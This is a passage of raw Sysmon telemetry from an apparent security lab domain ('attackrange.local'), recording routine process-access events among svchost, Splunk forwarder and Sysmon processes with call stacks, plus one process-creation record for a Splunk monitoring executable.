22:14:00.014{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+f97f|c:\windows\system32\lsm.dll+f7ad|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362519Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:00.014{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+f6ba|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362518Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:00.014{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362517Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:00.014{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362516Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:00.014{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362531Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:03.641{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362530Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:03.641{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362529Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:03.641{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362532Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:04.047{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362533Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:14.128{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362534Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:20.110{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+dbeb|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362536Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:24.439{8e433fbf-2a44-6013-0e00-000000001100}7124808C:\Windows\system32\svchost.exe{8e433fbf-35d8-6013-6f03-000000001100}10044C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a172|C:\Windows\SYSTEM32\psmserviceexthost.dll+19e3b|C:\Windows\SYSTEM32\psmserviceexthost.dll+bfd2|C:\Windows\SYSTEM32\psmserviceexthost.dll+1c362|C:\Windows\SYSTEM32\psmserviceexthost.dll+3658a|C:\Windows\SYSTEM32\psmserviceexthost.dll+361dc|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362535Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:24.220{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x800000000000000033030Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:26.850{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-3742-6013-8603-00000000A401}5944C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033029Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:26.850{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033028Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:26.850{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033027Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:26.850{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033026Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:26.850{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033025Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:26.850{FF16AF91-26B4-6013-0500-00000000A401}644760C:\Windows\system32\csrss.exe{FF16AF91-3742-6013-8603-00000000A401}5944C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000033024Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:26.850{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-3742-6013-8603-00000000A401}5944C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000033023Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:26.850{FF16AF91-3742-6013-8603-00000000A401}5944C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000033022Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:26.334{FF16AF91-3742-6013-8503-00000000A401}3064744C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033021Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:26.178{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-3742-6013-8503-00000000A401}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033020Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:26.178{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033019Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:26.178{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033018Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:26.178{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033017Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:26.178{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033016Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:26.178{FF16AF91-26B4-6013-0500-00000000A401}6442212C:\Windows\system32\csrss.exe{FF16AF91-3742-6013-8503-00000000A401}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000033015Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:26.178{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-3742-6013-8503-00000000A401}3064C:\Program 